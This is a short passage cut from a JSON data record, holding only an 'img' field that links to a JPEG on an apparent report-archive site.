		"img": "https://archive.orkl.eu/4cba649b032a613ba5d37cfa0e2b84f9d9f7e121.jpg"
	}
}